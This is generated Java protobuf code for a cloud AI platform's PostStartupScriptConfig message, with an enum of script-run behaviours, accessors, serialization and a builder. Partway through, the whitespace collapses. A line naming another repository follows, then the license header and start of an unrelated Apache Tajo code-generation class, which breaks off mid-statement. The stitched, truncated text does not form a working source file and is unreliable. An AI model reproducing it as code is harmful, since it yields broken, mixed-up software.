      if (this == UNRECOGNIZED) {
        throw new java.lang.IllegalArgumentException(
            "Can't get the number of an unknown enum value.");
      }
      return value;
    }

    /**
     * @param value The numeric wire value of the corresponding enum entry.
     * @return The enum associated with the given numeric wire value.
     * @deprecated Use {@link #forNumber(int)} instead.
     */
    @java.lang.Deprecated
    public static PostStartupScriptBehavior valueOf(int value) {
      return forNumber(value);
    }

    /**
     * @param value The numeric wire value of the corresponding enum entry.
     * @return The enum associated with the given numeric wire value.
     */
    public static PostStartupScriptBehavior forNumber(int value) {
      switch (value) {
        case 0:
          return POST_STARTUP_SCRIPT_BEHAVIOR_UNSPECIFIED;
        case 1:
          return RUN_ONCE;
        case 2:
          return RUN_EVERY_START;
        case 3:
          return DOWNLOAD_AND_RUN_EVERY_START;
        default:
          return null;
      }
    }

    public static com.google.protobuf.Internal.EnumLiteMap<PostStartupScriptBehavior>
        internalGetValueMap() {
      return internalValueMap;
    }

    private static final com.google.protobuf.Internal.EnumLiteMap<PostStartupScriptBehavior>
        internalValueMap =
            new com.google.protobuf.Internal.EnumLiteMap<PostStartupScriptBehavior>() {
              public PostStartupScriptBehavior findValueByNumber(int number) {
                return PostStartupScriptBehavior.forNumber(number);
              }
            };

    public final com.google.protobuf.Descriptors.EnumValueDescriptor getValueDescriptor() {
      if (this == UNRECOGNIZED) {
        throw new java.lang.IllegalStateException(
            "Can't get the descriptor of an unrecognized enum value.");
      }
      return getDescriptor().getValues().get(ordinal());
    }

    public final com.google.protobuf.Descriptors.EnumDescriptor getDescriptorForType() {
      return getDescriptor();
    }

    public static final com.google.protobuf.Descriptors.EnumDescriptor getDescriptor() {
      return com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.getDescriptor()
          .getEnumTypes()
          .get(0);
    }

    private static final PostStartupScriptBehavior[] VALUES = values();

    public static PostStartupScriptBehavior valueOf(
        com.google.protobuf.Descriptors.EnumValueDescriptor desc) {
      if (desc.getType() != getDescriptor()) {
        throw new java.lang.IllegalArgumentException("EnumValueDescriptor is not for this type.");
      }
      if (desc.getIndex() == -1) {
        return UNRECOGNIZED;
      }
      return VALUES[desc.getIndex()];
    }

    private final int value;

    private PostStartupScriptBehavior(int value) {
      this.value = value;
    }

    // @@protoc_insertion_point(enum_scope:google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior)
  }

  public static final int POST_STARTUP_SCRIPT_FIELD_NUMBER = 1;

  @SuppressWarnings("serial")
  private volatile java.lang.Object postStartupScript_ = "";
  /**
   * <code>string post_startup_script = 1 [(.google.api.field_behavior) = OPTIONAL];</code>
   *
   * @return The postStartupScript.
   */
  @java.lang.Override
  public java.lang.String getPostStartupScript() {
    java.lang.Object ref = postStartupScript_;
    if (ref instanceof java.lang.String) {
      return (java.lang.String) ref;
    } else {
      com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref;
      java.lang.String s = bs.toStringUtf8();
      // Cache the decoded String so subsequent calls skip the UTF-8 decode.
      postStartupScript_ = s;
      return s;
    }
  }

  /**
   * <code>string post_startup_script = 1 [(.google.api.field_behavior) = OPTIONAL];</code>
   *
   * @return The bytes for postStartupScript.
   */
  @java.lang.Override
  public com.google.protobuf.ByteString getPostStartupScriptBytes() {
    java.lang.Object ref = postStartupScript_;
    if (ref instanceof java.lang.String) {
      com.google.protobuf.ByteString b =
          com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref);
      postStartupScript_ = b;
      return b;
    } else {
      return (com.google.protobuf.ByteString) ref;
    }
  }

  public static final int POST_STARTUP_SCRIPT_URL_FIELD_NUMBER = 2;

  @SuppressWarnings("serial")
  private volatile java.lang.Object postStartupScriptUrl_ = "";
  /**
   * <code>string post_startup_script_url = 2 [(.google.api.field_behavior) = OPTIONAL];</code>
   *
   * @return The postStartupScriptUrl.
   */
  @java.lang.Override
  public java.lang.String getPostStartupScriptUrl() {
    java.lang.Object ref = postStartupScriptUrl_;
    if (ref instanceof java.lang.String) {
      return (java.lang.String) ref;
    } else {
      com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref;
      java.lang.String s = bs.toStringUtf8();
      postStartupScriptUrl_ = s;
      return s;
    }
  }

  /**
   * <code>string post_startup_script_url = 2 [(.google.api.field_behavior) = OPTIONAL];</code>
   *
   * @return The bytes for postStartupScriptUrl.
   */
  @java.lang.Override
  public com.google.protobuf.ByteString getPostStartupScriptUrlBytes() {
    java.lang.Object ref = postStartupScriptUrl_;
    if (ref instanceof java.lang.String) {
      com.google.protobuf.ByteString b =
          com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref);
      postStartupScriptUrl_ = b;
      return b;
    } else {
      return (com.google.protobuf.ByteString) ref;
    }
  }

  public static final int POST_STARTUP_SCRIPT_BEHAVIOR_FIELD_NUMBER = 3;

  // Enum stored as raw wire int so unrecognized values survive round-tripping.
  private int postStartupScriptBehavior_ = 0;
  /**
   * <code>
   * .google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior post_startup_script_behavior = 3 [(.google.api.field_behavior) = OPTIONAL];
   * </code>
   *
   * @return The enum numeric value on the wire for postStartupScriptBehavior.
   */
  @java.lang.Override
  public int getPostStartupScriptBehaviorValue() {
    return postStartupScriptBehavior_;
  }

  /**
   * <code>
   * .google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior post_startup_script_behavior = 3 [(.google.api.field_behavior) = OPTIONAL];
   * </code>
   *
   * @return The postStartupScriptBehavior.
   */
  @java.lang.Override
  public com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior
      getPostStartupScriptBehavior() {
    com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior result =
        com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior
            .forNumber(postStartupScriptBehavior_);
    return result == null
        ? com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior
            .UNRECOGNIZED
        : result;
  }

  private byte memoizedIsInitialized = -1;

  @java.lang.Override
  public final boolean isInitialized() {
    byte isInitialized = memoizedIsInitialized;
    if (isInitialized == 1) return true;
    if (isInitialized == 0) return false;

    memoizedIsInitialized = 1;
    return true;
  }

  // Proto3 serialization: fields equal to their default value are not written.
  @java.lang.Override
  public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException {
    if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(postStartupScript_)) {
      com.google.protobuf.GeneratedMessageV3.writeString(output, 1, postStartupScript_);
    }
    if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(postStartupScriptUrl_)) {
      com.google.protobuf.GeneratedMessageV3.writeString(output, 2, postStartupScriptUrl_);
    }
    if (postStartupScriptBehavior_
        != com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior
            .POST_STARTUP_SCRIPT_BEHAVIOR_UNSPECIFIED
            .getNumber()) {
      output.writeEnum(3, postStartupScriptBehavior_);
    }
    getUnknownFields().writeTo(output);
  }

  @java.lang.Override
  public int getSerializedSize() {
    int size = memoizedSize;
    if (size != -1) return size;

    size = 0;
    if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(postStartupScript_)) {
      size += com.google.protobuf.GeneratedMessageV3.computeStringSize(1, postStartupScript_);
    }
    if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(postStartupScriptUrl_)) {
      size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, postStartupScriptUrl_);
    }
    if (postStartupScriptBehavior_
        != com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior
            .POST_STARTUP_SCRIPT_BEHAVIOR_UNSPECIFIED
            .getNumber()) {
      size += com.google.protobuf.CodedOutputStream.computeEnumSize(3, postStartupScriptBehavior_);
    }
    size += getUnknownFields().getSerializedSize();
    memoizedSize = size;
    return size;
  }

  @java.lang.Override
  public boolean equals(final java.lang.Object obj) {
    if (obj == this) {
      return true;
    }
    if (!(obj instanceof com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig)) {
      return super.equals(obj);
    }
    com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig other =
        (com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig) obj;

    if (!getPostStartupScript().equals(other.getPostStartupScript())) return false;
    if (!getPostStartupScriptUrl().equals(other.getPostStartupScriptUrl())) return false;
    if (postStartupScriptBehavior_ != other.postStartupScriptBehavior_) return false;
    if (!getUnknownFields().equals(other.getUnknownFields())) return false;
    return true;
  }

  @java.lang.Override
  public int hashCode() {
    if (memoizedHashCode != 0) {
      return memoizedHashCode;
    }
    int hash = 41;
    hash = (19 * hash) + getDescriptor().hashCode();
    hash = (37 * hash) + POST_STARTUP_SCRIPT_FIELD_NUMBER;
    hash = (53 * hash) + getPostStartupScript().hashCode();
    hash = (37 * hash) + POST_STARTUP_SCRIPT_URL_FIELD_NUMBER;
    hash = (53 * hash) + getPostStartupScriptUrl().hashCode();
    hash = (37 * hash) + POST_STARTUP_SCRIPT_BEHAVIOR_FIELD_NUMBER;
    hash = (53 * hash) + postStartupScriptBehavior_;
    hash = (29 * hash) + getUnknownFields().hashCode();
    memoizedHashCode = hash;
    return hash;
  }

  // ---- parseFrom overloads delegating to the message PARSER ----

  public static com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig parseFrom(
      java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException {
    return PARSER.parseFrom(data);
  }

  public static com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig parseFrom(
      java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry)
      throws com.google.protobuf.InvalidProtocolBufferException {
    return PARSER.parseFrom(data, extensionRegistry);
  }

  public static com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig parseFrom(
      com.google.protobuf.ByteString data)
      throws com.google.protobuf.InvalidProtocolBufferException {
    return PARSER.parseFrom(data);
  }

  public static com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig parseFrom(
      com.google.protobuf.ByteString data,
      com.google.protobuf.ExtensionRegistryLite extensionRegistry)
      throws com.google.protobuf.InvalidProtocolBufferException {
    return PARSER.parseFrom(data, extensionRegistry);
  }

  public static com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig parseFrom(byte[] data)
      throws com.google.protobuf.InvalidProtocolBufferException {
    return PARSER.parseFrom(data);
  }

  public static com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig parseFrom(
      byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry)
      throws com.google.protobuf.InvalidProtocolBufferException {
    return PARSER.parseFrom(data, extensionRegistry);
  }

  public static com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig parseFrom(
      java.io.InputStream input) throws java.io.IOException {
    return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input);
  }

  public static com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig parseFrom(
      java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry)
      throws java.io.IOException {
    return com.google.protobuf.GeneratedMessageV3.parseWithIOException(
        PARSER, input, extensionRegistry);
  }

  public static
com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder( com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? 
new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** Protobuf type {@code google.cloud.aiplatform.v1beta1.PostStartupScriptConfig} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.aiplatform.v1beta1.PostStartupScriptConfig) com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfigOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.aiplatform.v1beta1.NotebookSoftwareConfigProto .internal_static_google_cloud_aiplatform_v1beta1_PostStartupScriptConfig_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.aiplatform.v1beta1.NotebookSoftwareConfigProto .internal_static_google_cloud_aiplatform_v1beta1_PostStartupScriptConfig_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.class, com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.Builder.class); } // Construct using com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; postStartupScript_ = ""; postStartupScriptUrl_ = ""; postStartupScriptBehavior_ = 0; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.aiplatform.v1beta1.NotebookSoftwareConfigProto .internal_static_google_cloud_aiplatform_v1beta1_PostStartupScriptConfig_descriptor; } @java.lang.Override public 
com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig getDefaultInstanceForType() { return com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.getDefaultInstance(); } @java.lang.Override public com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig build() { com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig buildPartial() { com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig result = new com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0(com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000001) != 0)) { result.postStartupScript_ = postStartupScript_; } if (((from_bitField0_ & 0x00000002) != 0)) { result.postStartupScriptUrl_ = postStartupScriptUrl_; } if (((from_bitField0_ & 0x00000004) != 0)) { result.postStartupScriptBehavior_ = postStartupScriptBehavior_; } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( 
com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig) { return mergeFrom((com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig other) { if (other == com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.getDefaultInstance()) return this; if (!other.getPostStartupScript().isEmpty()) { postStartupScript_ = other.postStartupScript_; bitField0_ |= 0x00000001; onChanged(); } if (!other.getPostStartupScriptUrl().isEmpty()) { postStartupScriptUrl_ = other.postStartupScriptUrl_; bitField0_ |= 0x00000002; onChanged(); } if (other.postStartupScriptBehavior_ != 0) { setPostStartupScriptBehaviorValue(other.getPostStartupScriptBehaviorValue()); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { postStartupScript_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000001; break; } // case 10 case 18: { postStartupScriptUrl_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000002; break; } // case 18 case 24: { postStartupScriptBehavior_ = input.readEnum(); bitField0_ |= 0x00000004; break; } // case 24 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } 
break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.lang.Object postStartupScript_ = ""; /** * <code>string post_startup_script = 1 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The postStartupScript. */ public java.lang.String getPostStartupScript() { java.lang.Object ref = postStartupScript_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); postStartupScript_ = s; return s; } else { return (java.lang.String) ref; } } /** * <code>string post_startup_script = 1 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The bytes for postStartupScript. */ public com.google.protobuf.ByteString getPostStartupScriptBytes() { java.lang.Object ref = postStartupScript_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); postStartupScript_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * <code>string post_startup_script = 1 [(.google.api.field_behavior) = OPTIONAL];</code> * * @param value The postStartupScript to set. * @return This builder for chaining. */ public Builder setPostStartupScript(java.lang.String value) { if (value == null) { throw new NullPointerException(); } postStartupScript_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } /** * <code>string post_startup_script = 1 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return This builder for chaining. 
*/ public Builder clearPostStartupScript() { postStartupScript_ = getDefaultInstance().getPostStartupScript(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); return this; } /** * <code>string post_startup_script = 1 [(.google.api.field_behavior) = OPTIONAL];</code> * * @param value The bytes for postStartupScript to set. * @return This builder for chaining. */ public Builder setPostStartupScriptBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); postStartupScript_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } private java.lang.Object postStartupScriptUrl_ = ""; /** * <code>string post_startup_script_url = 2 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The postStartupScriptUrl. */ public java.lang.String getPostStartupScriptUrl() { java.lang.Object ref = postStartupScriptUrl_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); postStartupScriptUrl_ = s; return s; } else { return (java.lang.String) ref; } } /** * <code>string post_startup_script_url = 2 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The bytes for postStartupScriptUrl. */ public com.google.protobuf.ByteString getPostStartupScriptUrlBytes() { java.lang.Object ref = postStartupScriptUrl_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); postStartupScriptUrl_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * <code>string post_startup_script_url = 2 [(.google.api.field_behavior) = OPTIONAL];</code> * * @param value The postStartupScriptUrl to set. * @return This builder for chaining. 
*/ public Builder setPostStartupScriptUrl(java.lang.String value) { if (value == null) { throw new NullPointerException(); } postStartupScriptUrl_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } /** * <code>string post_startup_script_url = 2 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return This builder for chaining. */ public Builder clearPostStartupScriptUrl() { postStartupScriptUrl_ = getDefaultInstance().getPostStartupScriptUrl(); bitField0_ = (bitField0_ & ~0x00000002); onChanged(); return this; } /** * <code>string post_startup_script_url = 2 [(.google.api.field_behavior) = OPTIONAL];</code> * * @param value The bytes for postStartupScriptUrl to set. * @return This builder for chaining. */ public Builder setPostStartupScriptUrlBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); postStartupScriptUrl_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } private int postStartupScriptBehavior_ = 0; /** * <code> * .google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior post_startup_script_behavior = 3 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @return The enum numeric value on the wire for postStartupScriptBehavior. */ @java.lang.Override public int getPostStartupScriptBehaviorValue() { return postStartupScriptBehavior_; } /** * <code> * .google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior post_startup_script_behavior = 3 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @param value The enum numeric value on the wire for postStartupScriptBehavior to set. * @return This builder for chaining. 
*/ public Builder setPostStartupScriptBehaviorValue(int value) { postStartupScriptBehavior_ = value; bitField0_ |= 0x00000004; onChanged(); return this; } /** * <code> * .google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior post_startup_script_behavior = 3 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @return The postStartupScriptBehavior. */ @java.lang.Override public com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior getPostStartupScriptBehavior() { com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior result = com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior .forNumber(postStartupScriptBehavior_); return result == null ? com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior .UNRECOGNIZED : result; } /** * <code> * .google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior post_startup_script_behavior = 3 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @param value The postStartupScriptBehavior to set. * @return This builder for chaining. */ public Builder setPostStartupScriptBehavior( com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior value) { if (value == null) { throw new NullPointerException(); } bitField0_ |= 0x00000004; postStartupScriptBehavior_ = value.getNumber(); onChanged(); return this; } /** * <code> * .google.cloud.aiplatform.v1beta1.PostStartupScriptConfig.PostStartupScriptBehavior post_startup_script_behavior = 3 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @return This builder for chaining. 
*/ public Builder clearPostStartupScriptBehavior() { bitField0_ = (bitField0_ & ~0x00000004); postStartupScriptBehavior_ = 0; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.aiplatform.v1beta1.PostStartupScriptConfig) } // @@protoc_insertion_point(class_scope:google.cloud.aiplatform.v1beta1.PostStartupScriptConfig) private static final com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig(); } public static com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<PostStartupScriptConfig> PARSER = new com.google.protobuf.AbstractParser<PostStartupScriptConfig>() { @java.lang.Override public PostStartupScriptConfig parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<PostStartupScriptConfig> 
parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<PostStartupScriptConfig> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.aiplatform.v1beta1.PostStartupScriptConfig getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
apache/tajo
35,790
tajo-core/src/main/java/org/apache/tajo/engine/codegen/TajoGeneratorAdapter.java
/** * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.tajo.engine.codegen; import com.google.common.base.Preconditions; import com.google.common.collect.Maps; import org.apache.tajo.common.TajoDataTypes; import org.apache.tajo.datum.*; import org.apache.tajo.exception.InvalidValueForCastException; import org.apache.tajo.exception.TajoRuntimeException; import org.apache.tajo.exception.UnsupportedException; import org.apache.tajo.org.objectweb.asm.Label; import org.apache.tajo.org.objectweb.asm.MethodVisitor; import org.apache.tajo.org.objectweb.asm.Opcodes; import org.apache.tajo.org.objectweb.asm.Type; import org.apache.tajo.org.objectweb.asm.commons.GeneratorAdapter; import org.apache.tajo.org.objectweb.asm.commons.TableSwitchGenerator; import org.apache.tajo.plan.expr.EvalNode; import org.apache.tajo.plan.expr.EvalType; import org.apache.tajo.type.Char; import org.apache.tajo.util.TUtil; import org.apache.tajo.util.datetime.DateTimeUtil; import java.util.HashMap; import java.util.Map; import static org.apache.tajo.common.TajoDataTypes.Type.*; class TajoGeneratorAdapter { public static final Map<EvalType, Map<TajoDataTypes.Type, Integer>> OpCodesMap = Maps.newHashMap(); static { TUtil.putToNestedMap(OpCodesMap, EvalType.PLUS, 
INT1, Opcodes.IADD); TUtil.putToNestedMap(OpCodesMap, EvalType.PLUS, INT2, Opcodes.IADD); TUtil.putToNestedMap(OpCodesMap, EvalType.PLUS, INT4, Opcodes.IADD); TUtil.putToNestedMap(OpCodesMap, EvalType.PLUS, INT8, Opcodes.LADD); TUtil.putToNestedMap(OpCodesMap, EvalType.PLUS, FLOAT4, Opcodes.FADD); TUtil.putToNestedMap(OpCodesMap, EvalType.PLUS, FLOAT8, Opcodes.DADD); TUtil.putToNestedMap(OpCodesMap, EvalType.MINUS, INT1, Opcodes.ISUB); TUtil.putToNestedMap(OpCodesMap, EvalType.MINUS, INT2, Opcodes.ISUB); TUtil.putToNestedMap(OpCodesMap, EvalType.MINUS, INT4, Opcodes.ISUB); TUtil.putToNestedMap(OpCodesMap, EvalType.MINUS, INT8, Opcodes.LSUB); TUtil.putToNestedMap(OpCodesMap, EvalType.MINUS, FLOAT4, Opcodes.FSUB); TUtil.putToNestedMap(OpCodesMap, EvalType.MINUS, FLOAT8, Opcodes.DSUB); TUtil.putToNestedMap(OpCodesMap, EvalType.MULTIPLY, INT1, Opcodes.IMUL); TUtil.putToNestedMap(OpCodesMap, EvalType.MULTIPLY, INT2, Opcodes.IMUL); TUtil.putToNestedMap(OpCodesMap, EvalType.MULTIPLY, INT4, Opcodes.IMUL); TUtil.putToNestedMap(OpCodesMap, EvalType.MULTIPLY, INT8, Opcodes.LMUL); TUtil.putToNestedMap(OpCodesMap, EvalType.MULTIPLY, FLOAT4, Opcodes.FMUL); TUtil.putToNestedMap(OpCodesMap, EvalType.MULTIPLY, FLOAT8, Opcodes.DMUL); TUtil.putToNestedMap(OpCodesMap, EvalType.DIVIDE, INT1, Opcodes.IDIV); TUtil.putToNestedMap(OpCodesMap, EvalType.DIVIDE, INT2, Opcodes.IDIV); TUtil.putToNestedMap(OpCodesMap, EvalType.DIVIDE, INT4, Opcodes.IDIV); TUtil.putToNestedMap(OpCodesMap, EvalType.DIVIDE, INT8, Opcodes.LDIV); TUtil.putToNestedMap(OpCodesMap, EvalType.DIVIDE, FLOAT4, Opcodes.FDIV); TUtil.putToNestedMap(OpCodesMap, EvalType.DIVIDE, FLOAT8, 